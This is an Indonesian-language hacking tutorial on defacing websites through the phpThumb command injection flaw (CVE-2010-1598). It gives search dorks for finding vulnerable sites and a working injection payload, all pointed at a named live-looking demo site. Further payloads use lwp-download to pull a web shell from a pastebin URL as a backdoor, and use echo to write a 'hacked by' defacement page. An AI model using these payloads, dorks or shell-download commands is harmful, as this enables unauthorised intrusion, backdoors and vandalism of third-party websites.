Tutorial - Cara Deface PhpThumb Command Injection | RCE Upload Shell

Keyword: Cara Deface phpThumb, CVE-2010-1598, Cara Deface CVE-2010-1598, Exploit CVE-2010-1598, Exploit phpThumb, phpThumb Tebas Index 

Dork:

inurl:/phpThumb/phpThumb.php

inurl:"/ibrowser/scripts/"

inurl:"/ibrowser/scripts/phpThumb/phpThumb.php"

inurl:/scripts/phpThumb/phpThumb.php

Demo:

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php

Exploit: 

?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9

Tutorial:

• Cari target vuln dengan menggunakan dork diatas
• Kemudian masukkan exploit pada akhir phpThumb.php 

Contoh: 

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg;ls -la;&phpThumbDebug=9

• Scroll kebagian bawah webnya jika isi dir dari web tersebut muncul, artinya command berhasil tereksekusi atau vuln. 

• Kemudian kita Upload shell shell Marijuana dengan exploit : 

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;lwp-download https://pastebin.com/raw/tizUkMj9 nakanosec.php;&phpThumbDebug=9

• Untuk akses Marijuana Shell Backdornya 

https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.php

Note: Jika kalian gagal upload shell kalian masih bisa upload script deface kalian dengan exploit seperti dibawah

http://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;echo "<center><h1>hacked by Anonymous Indonesia</h1>" > nakanosec.html;&phpThumbDebug=9

Akses Script Deface : https://www.dukesheltic.com/editor/plugins/ibrowser/scripts/phpThumb/nakanosec.html 

Nakanosec